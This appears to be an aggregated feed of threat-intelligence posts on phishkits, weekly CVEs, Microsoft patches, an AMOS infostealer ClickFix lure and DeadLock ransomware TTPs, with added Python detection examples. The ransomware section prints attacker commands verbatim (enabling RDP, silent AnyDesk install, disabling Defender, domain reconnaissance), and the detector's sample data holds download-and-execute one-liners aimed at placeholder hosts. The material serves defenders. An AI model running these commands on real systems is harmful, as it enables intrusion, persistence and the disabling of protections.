Often, no. Many phishkit campaigns start with no malware at all. The compromise happens entirely through web-based credential theft. Malware may appear later for persistence or lateral movement, but the initial access is usually “clean.” 

What are the most common signs of a phishkit attack? 

Early warning signs may include unusual redirect chains before a login page appears, very short-lived phishing domains, CAPTCHA on unexpected login flows, new mailbox forwarding rules, or login activity from unfamiliar locations immediately after authentication. 

Is blocking phishing domains enough to stop phishkits? 

No. Domain blocking alone is not enough because phishing domains rotate quickly, redirect chains change constantly, and infrastructure is reused across campaigns. Behavioral detection and live analysis are now essential. 

Will phishing get worse with phishkits in 2026? 

Yes. Phishkits are becoming more automated, more modular, harder to attribute, and better at evading scanners and sandboxes. Hybrid chains that combine multiple phishkits in one attack are already becoming common. 

What is the best long-term defense against phishkit attacks? 

A strong long-term defense combines phishing-resistant MFA such as FIDO2 or certificate-based authentication, live sandbox analysis, continuous IOC enrichment, threat intelligence feeds, and SOC playbooks built around behavioral detection. Because phishkits evolve constantly, defense must be continuous, not one-time. 

The post Phishing Kit Attacks 101: Everything SOC Analysts Should Know  appeared first on ANY.RUN’s Cybersecurity Blog.

The Week in Vulnerabilities: Cyble Urges D-Link, React Server Fixes

IT and ICS vulnerabilities

Cyble Vulnerability Intelligence researchers tracked 591 vulnerabilities in the last week, and more than 30 already have a publicly available Proof-of-Concept (PoC), significantly increasing the likelihood of real-world attacks on those vulnerabilities. 

A total of 69 vulnerabilities were rated as critical under the CVSS v3.1 scoring system, while 26 received a critical severity rating based on the newer CVSS v4.0 scoring system. 

Here are some of the more critical IT and ICS vulnerabilities flagged by Cyble in recent reports to clients. 

The Week’s Top IT Vulnerabilities 

CVE-2025-60854 is a critical command injection vulnerability found in the D-Link R15 (AX1500) router firmware 1.20.01 and below. The flaw has a severity score of 9.8 and requires no authentication or user interaction to exploit, making it highly dangerous for affected systems. 

CISA added five vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog in the last week: 

CVE-2025-55182 is a critical pre-authentication remote code execution (RCE) vulnerability in React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0, including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The vulnerability has been reportedly targeted by China-linked threat groups. 

CVE-2021-26829 is a cross-site scripting (XSS) vulnerability affecting OpenPLC ScadaBR that was targeted in recent attacks by the pro-Russian hacktivist group TwoNet on a honeypot simulating a water treatment facility, where the threat actors used default credentials for initial access, exploited the flaw to deface the HMI login page, and disabled logs and alarms in a little more than a day. 

Five days after adding CVE-2021-26829 to the KEV catalog, CISA added CVE-2021-26828, a high-severity Unrestricted Upload of File with Dangerous Type vulnerability affecting OpenPLC ScadaBR through 0.9.1 on Linux and through 1.12.4 on Windows. The flaw could allow remote authenticated users to upload and execute arbitrary JSP files via view_edit.shtm. 

CISA also added two Android vulnerabilities to the KEV catalog, both high-severity Android framework vulnerabilities. CVE-2025-48572 is a Privilege Escalation vulnerability, while CVE-2025-48633 is an Information Disclosure vulnerability. Neither vulnerability has been added to the National Vulnerability Database (NVD) yet. 

Notable vulnerabilities discussed in open-source communities included: 

CVE-2025-13223, a type confusion vulnerability in Google Chrome’s V8 JavaScript and WebAssembly engine, allowing remote attackers to exploit heap corruption via a crafted HTML page, potentially leading to arbitrary code execution. 

CVE-2025-11001,  a directory traversal remote code execution vulnerability in 7-Zip, stemming from improper handling of symbolic links in ZIP files, potentially allowing attackers to escape extraction directories and execute arbitrary code in the context of a service account upon user interaction with crafted archives.  

CVE-2025-58034, an OS command injection vulnerability in Fortinet FortiWeb web application firewalls. 

CVE-2025-41115, a critical privilege escalation and user impersonation vulnerability in Grafana Enterprise’s SCIM provisioning feature, which could allow attackers to create accounts impersonating privileged users, modify dashboards, access databases, alter alerts, and pivot to connected systems. 

CVE-2025-59366, a critical authentication bypass vulnerability in ASUS AiCloud routers, potentially allowing unauthorized execution of specific router functions via path traversal and OS command injection. 

Vulnerabilities Under Discussion on the Dark Web 

Cyble dark web researchers observed multiple threat actors (TA) on dark web and cybercrime forums discussing various exploits and weaponizing multiple vulnerabilities, including: 

CVE-2025-60709: A Windows Common Log File System (CLFS) Driver elevation of privilege vulnerability that could allow an authorized attacker to elevate privileges locally through an out-of-bounds read flaw. The specific flaw exists within the clfs.sys driver and results from improper validation of user-supplied data, which can lead to a read past the end of an allocated memory region.  

Local attackers can disclose sensitive information on affected Microsoft Windows installations and potentially exploit this vulnerability in conjunction with other vulnerabilities to execute arbitrary code in the context of the kernel, resulting in privilege escalation. 

CVE-2025-5931: A high-severity privilege escalation vulnerability in the Dokan Pro WordPress plugin, which stems from improper user identity validation during the staff password reset procedure, allowing attackers with vendor-level access to escalate their privileges to staff member level and then change arbitrary user passwords, including those of administrators, potentially leading to a full account takeover. 

CVE-2025-64446: A critical unauthenticated path traversal vulnerability in Fortinet FortiWeb WAF that could allow full administrative compromise of affected appliances via crafted HTTP(S) requests. The flaw is a relative path traversal (sometimes called “path confusion”) issue in the FortiWeb GUI / management API that could let an attacker reach an internal CGI handler and execute privileged operations without valid credentials. In practice, this becomes an authentication bypass that enables remote admin‑level control and, effectively, remote code execution on the WAF. 

ICS Vulnerabilities 

In addition to the OpenPLC ScadaBR vulnerabilities noted by CISA, Cyble threat intelligence researchers flagged four additional industrial control system (ICS) vulnerabilities in recent reports to clients. 

CVE-2024-3871 is a critical Stack-Based Buffer Overflow vulnerability affecting Emerson Appleton UPSMON-PRO, versions 2.6 and prior. Successful exploitation of the vulnerability could allow remote attackers to execute arbitrary code on affected installations of Appleton UPSMON-PRO. 

CVE-2025-13483 is a Missing Authentication for Critical Function vulnerability affecting SiRcom SMART Alert (SiSA), version 3.0.48. Successful exploitation of the vulnerability could enable an attacker to remotely activate or manipulate emergency sirens. 

CVE-2025-13658 is a Command Injection vulnerability affecting Longwatch versions 6.309 to 6.334. Successful exploitation could allow an unauthenticated attacker to gain remote code execution with elevated privileges. 

CVE-2025-13510 is a Missing Authentication for Critical Function vulnerability affecting Iskra iHUB and iHUB Lite, all versions. Successful exploitation could allow a remote attacker to reconfigure devices, update firmware, and manipulate connected systems without any credentials. 

Conclusion 

The wide range of critical and exploited vulnerabilities in this week’s report highlights the breadth of threats faced by security teams, who must respond with rapid, well-targeted actions to successfully defend IT and critical infrastructure. A risk-based vulnerability management program should be at the heart of those defensive efforts.  

Other cybersecurity best practices that can help guard against a wide range of threats include segmentation of critical assets; removing or protecting web-facing assets; Zero-Trust access principles; ransomware-resistant backups; hardened endpoints, infrastructure, and configurations; network, endpoint, and cloud monitoring; and well-rehearsed incident response plans.  

Cyble’s comprehensive attack surface management solutions can help by scanning network and cloud assets for exposures and prioritizing fixes, in addition to monitoring for leaked credentials and other early warning signs of major cyberattacks.  

The post The Week in Vulnerabilities: Cyble Urges D-Link, React Server Fixes appeared first on Cyble.

Cyble – Read More

Microsoft Patch Tuesday for December 2025 — Snort rules and prominent vulnerabilities

The Patch Tuesday for December of 2025 includes 57 vulnerabilities, including two that Microsoft marked as “critical.” The remaining vulnerabilities listed are classified as “important.” Microsoft assessed that exploitation of the two “critical” vulnerabilities is “less likely.” 

CVE‑2025‑62562 is a Microsoft Outlook remote code execution vulnerability. Although it involves a use after free in Microsoft Office Outlook to allow an unauthorized attacker to execute code locally, an attacker would still need to send a malicious email and persuade the user to reply to it for the exploit to work.  

CVE-2025-62553, CVE-2025-62554, CVE-2025-62556 and CVE-2025-62557 are Microsoft Office remote code execution vulnerabilities. Access of a resource using an incompatible type (‘type confusion’), a use after free, or an untrusted pointer dereference in Microsoft Office allows an unauthorized attacker to execute code locally. Although some of them are rated “critical”, successful exploitation requires the attacker to run exploit code on the local machine. 

CVE-2025-62456 is a remote code execution vulnerability in Windows Resilient File System (ReFS). It is a heap-based buffer overflow in ReFS that allows an authorized attacker to execute code over a network. Although the vulnerability has a high CVSS score, Microsoft has assessed that exploitation in the wild is unlikely. 

CVE-2025-62549 – Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability. An attacker could exploit this vulnerability by deceiving a user to send a request to a malicious server. The malicious server could then respond with crafted data that may lead to arbitrary code execution on the user’s system. However, exploitation of this vulnerability requires user interaction, meaning the attacker must wait for the user to initiate a connection to the malicious server set up by the attacker before the exploit can occur. This dependency on user action increases the complexity of a successful attack. 

CVE‑2025‑62565 and CVE‑2025‑64661 are Windows Shell elevation‑of‑privilege vulnerabilities. They involve issues such as use after free or concurrent execution using shared resources with improper synchronization (‘race condition’) in Windows Shell which could allow a local authorized attacker to gain higher privileges on the system. 

Cisco Talos would also like to highlight several vulnerabilities that are only rated as “important,” but Microsoft lists as “more likely” to be exploited: 

  • CVE-2025-62454 – Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability 
  • CVE-2025-62458 – Win32k Elevation of Privilege Vulnerability 
  • CVE-2025-62470 – Windows Common Log File System Driver Elevation of Privilege Vulnerability 
  • CVE-2025-62472 – Windows Remote Access Connection Manager Elevation of Privilege Vulnerability 
  • CVE-2025-59516 and CVE-2025-59517 – Windows Storage VSP Driver Elevation of Privilege Vulnerability 
  • CVE-2025-62221 – Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability 

A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page. In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The rules included in this release that protect against the exploitation of many of these vulnerabilities are: 62486, 62487, 65555-65562, 65571-65574. There are also these Snort 3 rules: 300719, 301351-301354, 301356, 301357.

Cisco Talos Blog – Read More

The AMOS infostealer is piggybacking ChatGPT’s chat-sharing feature | Kaspersky official blog

Infostealers — malware that steals passwords, cookies, documents, and/or other valuable data from computers — have become 2025’s fastest-growing cyberthreat. This is a critical problem for all operating systems and all regions. To spread their infections, criminals use every possible trick as bait. Unsurprisingly, AI tools have become one of their favorite luring mechanisms this year. In a new campaign discovered by Kaspersky experts, the attackers steer their victims to a website that supposedly contains user guides for installing OpenAI’s new Atlas browser for macOS. What makes the attack so convincing is that the bait link leads to… the official ChatGPT website! But how?

The bait-link in search results

To attract victims, the malicious actors place paid search ads on Google. If you try to search for “chatgpt atlas”, the very first sponsored link could be a site whose full address isn’t visible in the ad, but is clearly located on the chatgpt.com domain.

The page title in the ad listing is also what you’d expect: “ChatGPT™ Atlas for macOS – Download ChatGPT Atlas for Mac”. And a user wanting to download the new browser could very well click that link.

A sponsored link to a malware installation guide in Google search results

A sponsored link in Google search results leads to a malware installation guide disguised as ChatGPT Atlas for macOS and hosted on the official ChatGPT site. How can that be?

The Trap

Clicking the ad does indeed open chatgpt.com, and the victim sees a brief installation guide for the “Atlas browser”. The careful user will immediately realize this is simply some anonymous visitor’s conversation with ChatGPT, which the author made public using the Share feature. Links to shared chats begin with chatgpt.com/share/. In fact, it’s clearly stated right above the chat: “This is a copy of a conversation between ChatGPT & anonymous”.

However, a less careful or just less AI-savvy visitor might take the guide at face value — especially since it’s neatly formatted and published on a trustworthy-looking site.

Variants of this technique have been seen before — attackers have abused other services that allow sharing content on their own domains: malicious documents in Dropbox, phishing in Google Docs, malware in unpublished comments on GitHub and GitLab, crypto traps in Google Forms, and more. And now you can also share a chat with an AI assistant, and the link to it will lead to the chatbot’s official website.

Notably, the malicious actors used prompt engineering to get ChatGPT to produce the exact guide they needed, and were then able to clean up their preceding dialog to avoid raising suspicion.

Malware installation instructions disguised as Atlas for macOS

The installation guide for the supposed Atlas for macOS is merely a shared chat between an anonymous user and ChatGPT in which the attackers, through crafted prompts, forced the chatbot to produce the desired result and then sanitized the dialog.

The infection

To install the “Atlas browser”, users are instructed to copy a single line of code from the chat, open Terminal on their Macs, paste and execute the command, and then grant all required permissions.

The specified command essentially downloads a malicious script from a suspicious server, atlas-extension{.}com, and immediately runs it on the computer. We’re dealing with a variation of the ClickFix attack. Typically, scammers suggest “recipes” like these for passing CAPTCHA, but here we have steps to install a browser. The core trick, however, is the same: the user is prompted to manually run a shell command that downloads and executes code from an external source. Many already know not to run files downloaded from shady sources, but this doesn’t look like launching a file.

When run, the script asks the user for their system password and checks if the combination of “current username + password” is valid for running system commands. If the entered data is incorrect, the prompt repeats indefinitely. If the user enters the correct password, the script downloads the malware and uses the provided credentials to install and launch it.
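The ClickFix lure described above hinges on one pasted command that fetches code from the network and runs it. As an added illustration (not part of Kaspersky's article), here is a small Python triage helper of the kind a help desk or a cautious user could run over a pasted command before executing it; the sample commands and hostnames are constructed, and the patterns are deliberately broad heuristics rather than a complete classifier:

```python
import re

# Constructed sample commands (not taken from the campaign). The first four have the
# download-and-execute shape of ClickFix lures; the last two are ordinary, benign commands.
SAMPLE_COMMANDS = [
    "curl -fsSL https://installer.example.invalid/setup.sh | bash",
    'bash -c "$(curl -s http://203.0.113.10/a.sh)"',
    "echo aGVsbG8= | base64 -d | sh",
    "curl -o /tmp/x https://cdn.example.invalid/x && chmod +x /tmp/x && /tmp/x",
    "brew install --cask some-browser",
    "ls -la ~/Downloads",
]

# Deliberately broad heuristics: anything that pulls content from the network (or decodes an
# opaque blob) and hands it to an interpreter deserves a human look before it is run.
RULES = [
    ("download piped to shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z|k)?sh\b")),
    ("command substitution of fetched content",
     re.compile(r"\$\(\s*(curl|wget)\b")),
    ("decoded payload piped to shell",
     re.compile(r"\bbase64\s+(-d|--decode)\b[^|]*\|\s*(ba|z|k)?sh\b")),
    ("remote fetch to disk then execute",
     re.compile(r"\b(curl|wget)\b.*(&&|;)\s*(chmod\s+\+x|\./|open\s|osascript)")),
]

URL_HOST = re.compile(r"https?://([A-Za-z0-9.\-\[\]:]+)")


def assess_command(cmd: str) -> list:
    """Names of every rule the command trips; an empty list means nothing matched."""
    return [name for name, rx in RULES if rx.search(cmd)]


def extract_hosts(cmd: str) -> list:
    """Hostnames or IPs referenced by URLs in the command (useful for blocking or hunting)."""
    return sorted({m.group(1) for m in URL_HOST.finditer(cmd)})


def triage(commands) -> dict:
    """Map each command to a verdict, the matched rules and any network hosts it contacts."""
    report = {}
    for cmd in commands:
        hits = assess_command(cmd)
        report[cmd] = {
            "verdict": "SUSPICIOUS: do not run without review" if hits else "no download-and-execute pattern",
            "rules": hits,
            "hosts": extract_hosts(cmd),
        }
    return report


if __name__ == "__main__":
    for cmd, result in triage(SAMPLE_COMMANDS).items():
        print(f"{result['verdict']}\n    {cmd}")
        for name in result["rules"]:
            print(f"    - {name}")
        if result["hosts"]:
            print(f"    contacts: {', '.join(result['hosts'])}")
```

The point of the rules is the shape of the command, not any particular domain: a lure can rotate hosts daily, but it cannot avoid fetching and executing something. A match is a prompt to stop and ask, which is exactly the advice in the article's checklist.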

The infostealer and the backdoor

If the user falls for the ruse, a common infostealer known as AMOS (Atomic macOS Stealer) will launch on their computer. AMOS is capable of collecting a wide range of potentially valuable data: passwords, cookies, and other information from Chrome, Firefox, and other browser profiles; data from crypto wallets like Electrum, Coinomi, and Exodus; and information from applications like Telegram Desktop and OpenVPN Connect. Additionally, AMOS steals files with extensions TXT, PDF, and DOCX from the Desktop, Documents, and Downloads folders, as well as files from the Notes application’s media storage folder. The infostealer packages all this data and sends it to the attackers’ server.

The cherry on top is that the stealer installs a backdoor, and configures it to launch automatically upon system reboot. The backdoor essentially replicates AMOS’s functionality, while providing the attackers with the capability of remotely controlling the victim’s computer.

How to protect yourself from AMOS and other malware in AI chats

This wave of new AI tools allows attackers to repackage old tricks and target users who are curious about the new technology but don’t yet have extensive experience interacting with large language models.

We’ve already written about a fake chatbot sidebar for browsers and fake DeepSeek and Grok clients. Now the focus has shifted to exploiting the interest in OpenAI Atlas, and this certainly won’t be the last attack of its kind.

What should you do to protect your data, your computer, and your money?

  • Use reliable anti-malware protection on all your smartphones, tablets, and computers, including those running macOS or Linux.
  • If any website, instant message, document, or chat asks you to run any commands — like pressing Win+R or Command+Space and then launching PowerShell or Terminal — don’t. You’re very likely facing a ClickFix attack. Attackers typically try to draw users in by urging them to fix a “problem” on their computer, neutralize a “virus”, “prove they are not a robot”, or “update their browser or OS now”. However, a more neutral-sounding option like “install this new, trending tool” is also possible.
  • Never follow any guides you didn’t ask for and don’t fully understand.
  • The easiest thing to do is immediately close the website or delete the message with these instructions. But if the task seems important, and you can’t figure out the instructions you’ve just received, consult someone knowledgeable. A second option is to simply paste the suggested commands into a chat with an AI bot, and ask it to explain what the code does and whether it’s dangerous. ChatGPT typically handles this task fairly well.

ChatGPT warns that following the malicious instructions is risky

If you ask ChatGPT whether you should follow the instructions you received, it will answer that it’s not safe

How else do malicious actors use AI for deception?

Kaspersky official blog – Read More

New BYOVD loader behind DeadLock ransomware attack

  • While tracking ransomware activities, Cisco Talos uncovered new tactics, techniques, and procedures (TTPs) linked to a financially motivated threat actor targeting victims with DeadLock ransomware. 
  • The actor used the Bring Your Own Vulnerable Driver (BYOVD) technique with a previously unknown loader to exploit the Baidu Antivirus driver vulnerability (CVE-2024-51324), enabling the termination of endpoint detection and response (EDR) processes. 
  • The actor ran a PowerShell script that bypasses User Account Control (UAC), disables Windows Defender, terminates various security, backup, and database services, and deletes all volume shadow copies to prevent system recovery. 
  • The DeadLock ransomware targets Windows machines with a custom stream cipher encryption algorithm that uses time-based cryptographic keys to encrypt files. 
  • This custom encryption method allows DeadLock ransomware to effectively encrypt different file types in enterprise environments while preventing system corruption through selective targeting and anti-forensics techniques, which complicate recovery.

Disabling EDR services via BYOVD technique 

T1211 – Exploitation for defense evasion 

Talos observed a threat actor leveraging a BYOVD technique to disable endpoint detection and escalate privileges in an attack that eventually delivered DeadLock ransomware as the payload. 

The attack relied on “BdApiUtil.sys”, a legitimate Baidu Antivirus driver containing an Improper Privilege Management vulnerability with CVE-2024-51324 which the actor disguised using the file name “DriverGay.sys”. This Improper Privilege Management vulnerability exposes a critical function in the driver program that allows unprivileged users to terminate any process on the system at the kernel level. 

The attack began when the actor dropped the loader (using the file name “EDRGay.exe”) and the vulnerable driver into the victim’s Videos folder and ran the loader. The loader, running in user mode, initializes the driver and establishes a connection via the CreateFile() Windows API. It specifies the driver’s real device name (“\\.\BdApiUtil”) to obtain a handle which essentially acts as a “ticket” to authorize future communication between the loader and the driver. 

Once connected, the loader enumerates running system processes to identify the process ID (PID) of the target antivirus or EDR solution. To trigger the exploit, it calls the DeviceIOControl() function, passing the target PID along with the specific I/O Control Code (IOCTL) 0x800024b4. 

This 32-bit IOCTL value is structured to instruct the driver exactly how to operate: 

  • Device Type: 0x8000 
  • Access: 0x0 (FILE_ANY_ACCESS) 
  • Method: 0x0 (METHOD_BUFFERED) 
  • Function Code: 0x92D 

Figure 1. Function snippet of the loader, EDRGay, loading the driver and sending the IOCTL command. 

Upon receiving the request, the driver decodes the function code 0x92D as a “terminate process” command. Due to the CVE-2024-51324 vulnerability, the driver fails to validate if the user-mode program has the necessary permissions to make this request. Because the driver operates in kernel mode with the highest system privileges, it blindly accepts the command and executes ZwTerminateProcess(), instantly killing the targeted security service. 
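The field breakdown above is the standard CTL_CODE layout, so the value 0x800024b4 can be decoded and re-encoded mechanically. The following Python helper is an added example, not code from Talos or from the loader: it decodes the IOCTL quoted in the write-up and flags codes whose device type and function number both fall in the ranges Microsoft reserves for third-party drivers, a useful first triage step when an unfamiliar IOCTL shows up in driver or ETW telemetry. The contrasting value 0x00070000 is the documented IOCTL_DISK_GET_DRIVE_GEOMETRY code.

```python
from dataclasses import dataclass

# Layout of a 32-bit Windows I/O control code, as built by the CTL_CODE macro:
#   bits 31..16  DeviceType   (0x8000-0xFFFF reserved for third-party vendors)
#   bits 15..14  Access       (FILE_ANY_ACCESS=0, FILE_READ_ACCESS=1, FILE_WRITE_ACCESS=2)
#   bits 13..2   Function     (12 bits; 0x800-0xFFF reserved for third-party vendors)
#   bits  1..0   Method       (METHOD_BUFFERED=0 ... METHOD_NEITHER=3)
METHOD_NAMES = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
                2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS_NAMES = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS", 2: "FILE_WRITE_ACCESS",
                3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}


@dataclass(frozen=True)
class Ioctl:
    device_type: int
    access: int
    function: int
    method: int

    @property
    def vendor_defined(self) -> bool:
        """True when both fields sit in the ranges reserved for third-party drivers."""
        return self.device_type >= 0x8000 and self.function >= 0x800

    def describe(self) -> str:
        return (f"DeviceType=0x{self.device_type:04X} Access={ACCESS_NAMES[self.access]} "
                f"Function=0x{self.function:03X} Method={METHOD_NAMES[self.method]}")


def decode_ioctl(code: int) -> Ioctl:
    """Split a control code into its four fields (the inverse of CTL_CODE)."""
    if not 0 <= code <= 0xFFFFFFFF:
        raise ValueError("an IOCTL must fit in 32 bits")
    return Ioctl(device_type=(code >> 16) & 0xFFFF,
                 access=(code >> 14) & 0x3,
                 function=(code >> 2) & 0xFFF,
                 method=code & 0x3)


def ctl_code(device_type: int, function: int, method: int, access: int) -> int:
    """Python port of CTL_CODE(DeviceType, Function, Method, Access) from the Windows SDK."""
    return (((device_type & 0xFFFF) << 16) | ((access & 0x3) << 14)
            | ((function & 0xFFF) << 2) | (method & 0x3))


if __name__ == "__main__":
    # The code quoted in the write-up, plus a documented Microsoft IOCTL for contrast.
    for code in (0x800024B4, 0x00070000):
        io = decode_ioctl(code)
        print(f"0x{code:08X}: {io.describe()} vendor-defined={io.vendor_defined}")
```

Decoding 0x800024b4 yields exactly the four fields listed above (device type 0x8000, FILE_ANY_ACCESS, METHOD_BUFFERED, function 0x92D), and re-encoding those fields with ctl_code() gives the original value back.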

Figure 2. Function snippets of vulnerable drivers for terminating the targeted processes. 

PowerShell script for inhibiting system recovery 

T1548.002 – Bypass User Account Control 

T1490 – Inhibit system recovery  

Talos observed that the threat actor executed a PowerShell script in the victim’s machine before the encryption process. The PowerShell script is a pre-encryption preparation component of the attack that the actor used to bypass the UAC, disable the detection services, and inhibit the system recovery of the victim machine.  

The script implements a privilege escalation mechanism through the Test-Admin function that automatically detects current user permissions and re-launches itself with administrative privileges using the Verb RunAs parameter, ensuring it operates with the necessary system-level access required for service manipulation and shadow copy deletion. This elevation technique bypasses UAC prompts through the exec bypass execution policy override, allowing the script to execute without standard PowerShell security restrictions. 

Figure 3. Snippet of the PowerShell script escalating the privilege. 

The main functionality of the script centers around service termination, designed to disable security software, backup systems, and database applications that could affect the ransomware encryption process. It includes an extensive exclusion list of Windows services that must remain operational to maintain basic functionality of the system for ransom payment discussions and processing, including core networking services (Winrm, Dns, Dhcp), authentication mechanisms (Kdc, Netlogon, Lsm), and essential system components (Rpcss, Plugplay, Eventlog).  

The script targets the running services outside the exclusion list, which not only terminates active services but permanently disables their startup configuration to prevent automatic recovery during system reboots.  

The script executes commands to delete all volume shadow copy snapshots, eliminating the victim’s ability to recover the system. It has a self-deletion mechanism that removes the traces of its existence in the victim machine, hindering the forensic analysis efforts.  

Figure 4. Snippet of the PowerShell script deleting the shadowcopy. 

Talos found that the threat actor disabled several other commands in the script that are designed to eliminate network shares and terminate system processes and services through alternative methods. The network share deletion commands target Windows file sharing infrastructure through Windows Management Instrumentation (WMI) queries, removing all standard network shares while preserving administrative and domain controller shares, which isolates the infected system from network file sharing that could be used for lateral movement or data exfiltration. Further commands target print-related shares by removing the print$ and prnproc$ administrative shares, disrupting network printing services that could potentially be used as communication channels or recovery mechanisms.  

There are also process termination commands which are designed to directly kill the PIDs associated with the running services that are not on the exclusion list, bypassing standard service shutdown procedures that would trigger alerts before termination.  

Talos spotted a service startup modification command in the script that shows the advanced Windows service management techniques used to permanently alter service startup configurations, ensuring that even after system reboots, targeted services remain disabled. 

We also observed a file-based exclusion technique in the final section of the script where it reads the exclusion service names from an external file “run[.]txt”, indicating the dynamic control of the service exclusion list depending upon the targeted environments.  

Figure 5. Snippet of PowerShell script with alternative methods of terminating the targeted services. 

Other notable TTPs 

Talos discovered several other notable TTPs of the DeadLock ransomware attacks from the telemetry data. Our assessment revealed that the actor had access to the victim’s network five days prior to the ransomware deployment.   

Initial access and system registry modification  

T1078 – Valid Accounts 

T1112 – Modify Registry 

T1021.001 – Remote Desktop Protocol 

T1562.004 – Disable or Modify System Firewall 

T1569.002 – Service execution 

Talos suspects that the threat actor leverages the compromised valid accounts to gain access to the victim’s machine based on telemetry data. 

Upon gaining the system access, we observed that the threat actor attempted to enable and expose remote access services on the victim machine by using the reg add command to modify the fDenyTSConnections registry value, which directly enables the machine to accept Remote Desktop Protocol (RDP) connections. Then, the actor executed the netsh advfirewall command to create a new inbound firewall rule, opening TCP port 3389 to ensure RDP traffic isn’t blocked. Finally, they used sc config and sc start to change the RemoteRegistry service to on-demand and immediately start it, allowing them to query and modify the system’s registry from another machine for further reconnaissance and configuration modifications. 

reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 

netsh advfirewall firewall add rule name=allow RemoteDesktop dir=in protocol=TCP localport=3389 action=allow 

sc config RemoteRegistry start= demand 

Sc start RemoteRegistry 

Remote access for persistent connection 

T1219.002 – Remote Desktop Software 

We assess that the threat actor, operating from a compromised user account, installed a new instance of AnyDesk on a specific host one day prior to an encryption event. This action was likely taken to establish persistent, remote access. 

While other instances of AnyDesk were already present in the environment, this new installation was suspicious. The actor used a specific sequence of commands to silently install the software, configure it to start with Windows, and set up a password for unattended access, while disabling updates that might terminate the actor’s connection to the victim’s machine. 

C:\AnyDesk.exe --install C:\Program Files (x86)\AnyDesk --start-with-win --silent --update-disabled 

C:\Program Files (x86)\AnyDesk\AnyDesk.exe --start-service 

C:\Program Files (x86)\AnyDesk\AnyDesk.exe --set-password 

C:\Program Files (x86)\AnyDesk\AnyDesk.exe --control 

Reconnaissance and lateral movement  

T1018 – Remote System Discovery 

T1069.002 – Domain discovery 

T1033 – System owner / user discovery 

T1046 – Network service discovery 

T1218.014 – System Binary proxy execution: MMC 

T1102 – Web Service 

Talos observed several commands the actor executed for internal reconnaissance and lateral movement within the victim environment following the AnyDesk installation, highlighting their intent to discover and move to high-value targets.  

The actor attempted to discover domain controllers, query the domain structure, and enumerate the privileged groups and their members. They performed a connectivity test using a ping command to see if a target machine was reachable and checked the logged-on user details by executing the Quser command.  

Then, with the discovered internal IP addresses, the actor moved laterally by executing the mstsc command to start the Remote Desktop Protocol (RDP) session. They also executed the mmc.exe compmgmt.msc command, which is an alternative remote computer management command without a full interactive RDP session. Finally, the actor executed iexplore.exe, likely to access an internal web resource.  

Nltest /dclist 

Nltest  

Nltest dclist: DC HOST NAME 

Net local group /domain  

Mstsc.exe /v:   

Ping  

Quser 

iexplore.exe http: INTERNAL IP ADDRESS 

mmc.exe compmgmt.msc /computer: INTERNAL IP ADDRESS 

Impair defenses 

T1562.001 – Disable or Modify tools 

T1218 – System Binary Proxy Execution 

Talos observed that the actor modified the Windows Defender settings using the legitimate Windows executable SystemSettingsAdminFlows.exe. By executing the following commands, the actor disabled Real-Time Protection (RTP) in Windows Defender. They subsequently disabled cloud-based protections through the command SpynetReporting 0, which stops the machine from sending threat reports to Microsoft. The command SubmitSamplesConsent 0 prevents Windows Defender from automatically submitting suspicious files for analysis. 

SystemSettingsAdminFlows.exe Defender RTP 1 

SystemSettingsAdminFlows.exe Defender SpynetReporting 0 

SystemSettingsAdminFlows.exe Defender SubmitSamplesConsent 0 

SystemSettingsAdminFlows.exe Defender DisableEnhancedNotifications 1 
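The registry, firewall, service, AnyDesk and Defender commands quoted in the sections above are all plain command lines, which makes them good candidates for process-creation detection. The block below is an added example, not Talos code: it runs six regex rules over constructed process-creation events that mirror those commands (hostnames, users and timestamps are invented, and path backslashes are restored), then correlates per host so that one command stays a low-severity signal while several distinct techniques on the same host inside a window raise an alert. The ATT&CK technique IDs are the ones cited in the write-up.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation events (not real telemetry). Command lines mirror the ones
# quoted in the write-up; hosts, users and times are invented. One benign event is included.
EVENTS = [
    {"ts": "2025-11-03T09:14:02", "host": "WS-17", "user": r"CORP\j.doe",
     "cmd": r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'},
    {"ts": "2025-11-03T09:14:40", "host": "WS-17", "user": r"CORP\j.doe",
     "cmd": 'netsh advfirewall firewall add rule name="allow RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow'},
    {"ts": "2025-11-03T09:15:05", "host": "WS-17", "user": r"CORP\j.doe",
     "cmd": "sc config RemoteRegistry start= demand"},
    {"ts": "2025-11-03T09:15:09", "host": "WS-17", "user": r"CORP\j.doe",
     "cmd": "Sc start RemoteRegistry"},
    {"ts": "2025-11-03T09:20:00", "host": "WS-17", "user": r"CORP\j.doe",
     "cmd": r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"},   # benign
    {"ts": "2025-11-04T22:41:13", "host": "FS-02", "user": r"CORP\svc-backup",
     "cmd": "SystemSettingsAdminFlows.exe Defender RTP 1"},
    {"ts": "2025-11-04T22:41:15", "host": "FS-02", "user": r"CORP\svc-backup",
     "cmd": "SystemSettingsAdminFlows.exe Defender SpynetReporting 0"},
    {"ts": "2025-11-04T22:41:16", "host": "FS-02", "user": r"CORP\svc-backup",
     "cmd": "SystemSettingsAdminFlows.exe Defender SubmitSamplesConsent 0"},
    {"ts": "2025-11-05T07:02:31", "host": "ADMIN-01", "user": r"CORP\j.doe",
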